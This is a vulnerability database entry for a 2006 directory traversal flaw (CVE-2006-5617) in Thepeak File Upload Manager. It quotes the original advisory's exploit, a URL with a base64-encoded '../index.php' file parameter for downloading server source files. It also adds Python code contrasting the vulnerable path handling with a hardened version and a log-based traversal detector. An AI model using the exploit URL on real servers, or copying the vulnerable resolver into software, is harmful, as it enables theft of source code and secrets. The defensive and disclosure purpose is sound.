Thepeak File Upload Manager 'index.php' Directory Traversal Vulnerability

Vulnerability ID: 1193021    Vulnerability type: Path traversal
Published: 2006-10-30    Updated: 2006-11-02
CVE: CVE-2006-5617    CNNVD ID: CNNVD-200610-519
Platform: N/A    CVSS score: 7.5
|Sources
https://cxsecurity.com/issue/WLB-2006110001
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-519
|Details
A directory traversal vulnerability exists in index.php of Thepeak File Upload Manager 1.3. A remote attacker can read or download arbitrary files by supplying a base64-encoded file path that contains ".." (dot dot) in the file parameter.
|Exploit
Thepeak File Upload v1.3 : Read file vulnerability
Discovered By: Phạm Đức Hải (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com
-------------------------
Description:
file upload manager 1.3
written by thepeak (adam medici)
copyright (c) 2003 thepeak of mtnpeak.net
A simple, powerful tool to upload and manage files using your web browser.

There are some bugs in Thepeak File Upload v1.3 :
http://www.securityfocus.com/archive/1/378494
Today, I found a bug in Thepeak File Upload v1.3; this bug allows an attacker
to download source files (.php, ...) from the server.
-------------------------
Exploit :
http://somesite.com/example/index.php --> upload form
Now, we upload one file to the server, e.g. test.jpg --> ok
We have its url to view it : http://somesite.com/example/index.php?act=view&file=dGVzdC5qcGc=
and the url to download it : http://somesite.com/example/index.php?act=dl&file=dGVzdC5qcGc=
Notice that the value "dGVzdC5qcGc=" of the parameter file is the base64 encoding of "test.jpg".
We need to get the source file http://somesite.com/index.php.
Base64-encode the path to index.php above : ../index.php --> Li4vaW5kZXgucGhw
==> we have the link to download source file index.php (notice act=dl)

http://somesite.com/example/index.php?act=dl&file=Li4vaW5kZXgucGhw

You can also download other files.
Have fun!
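The flaw described above is a missing containment check: the application base64-decodes the file parameter and opens whatever path results, so "../index.php" escapes the upload directory. The following is an added example (not part of the advisory or the Thepeak product) that contrasts that flawed resolution with a hardened one and adds a small detector that decodes the file parameter in request lines and reports traversal attempts. The upload directory path, the helper names and the sample log lines are constructed for the example.

```python
import base64
import binascii
import posixpath
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed placeholder for the directory index.php is meant to serve from.
UPLOAD_DIR = "/var/www/html/example/uploads"


def decode_file_param(encoded: str) -> Optional[str]:
    """Decode the base64 'file' parameter; return None if it is not valid base64 text."""
    try:
        return base64.b64decode(encoded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def vulnerable_resolve(encoded: str) -> str:
    """The flawed pattern: decode and join with the upload directory, no check.

    A decoded value of '../index.php' normalises to a path outside UPLOAD_DIR.
    """
    name = decode_file_param(encoded) or ""
    return posixpath.normpath(posixpath.join(UPLOAD_DIR, name))


def safe_resolve(encoded: str) -> Optional[str]:
    """Hardened form: only a bare file name is accepted, and the normalised
    path must still lie inside UPLOAD_DIR. Returns None when the request is rejected."""
    name = decode_file_param(encoded)
    if not name:
        return None
    # A stored upload is a single path component: no separators, no '.' or '..'.
    if posixpath.basename(name) != name or name in (".", ".."):
        return None
    resolved = posixpath.normpath(posixpath.join(UPLOAD_DIR, name))
    # Defence in depth: confirm containment even after the name check.
    if posixpath.commonpath([UPLOAD_DIR, resolved]) != UPLOAD_DIR:
        return None
    return resolved


def flag_traversal_requests(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Detection over request lines of the form 'METHOD PATH PROTO STATUS':
    decode every file= value and report those containing a separator or '..'."""
    hits = []
    for line in log_lines:
        parts = line.split()
        path = parts[1] if len(parts) > 1 else ""
        query = parse_qs(urlsplit(path).query)
        for enc in query.get("file", []):
            decoded = decode_file_param(enc)
            if decoded and ("/" in decoded or "\\" in decoded or ".." in decoded):
                hits.append((path, decoded))
    return hits


# Constructed sample log lines: a legitimate view and a traversal download.
SAMPLE_LOG = [
    "GET /example/index.php?act=view&file=dGVzdC5qcGc= HTTP/1.1 200",
    "GET /example/index.php?act=dl&file=Li4vaW5kZXgucGhw HTTP/1.1 200",
]

if __name__ == "__main__":
    for enc in ("dGVzdC5qcGc=", "Li4vaW5kZXgucGhw"):
        print(enc, "->", vulnerable_resolve(enc), "| safe:", safe_resolve(enc))
    print("flagged:", flag_traversal_requests(SAMPLE_LOG))
```

The name check (basename must equal the whole decoded value) is the primary control; the commonpath check is kept as a second line so that a future change to the naming rule cannot silently reopen the traversal. The detector works on the decoded value rather than the raw parameter because, as the advisory shows, the ".." never appears in the URL itself.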
|References

Source: BID
Name: 20760
Link: http://www.securityfocus.com/bid/20760
Source: BUGTRAQ
Name: 20061026 Thepeak File Upload v1.3 : Read file vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/449936/100/0/threaded
Source: SREASON
Name: 1798
Link: http://securityreason.com/securityalert/1798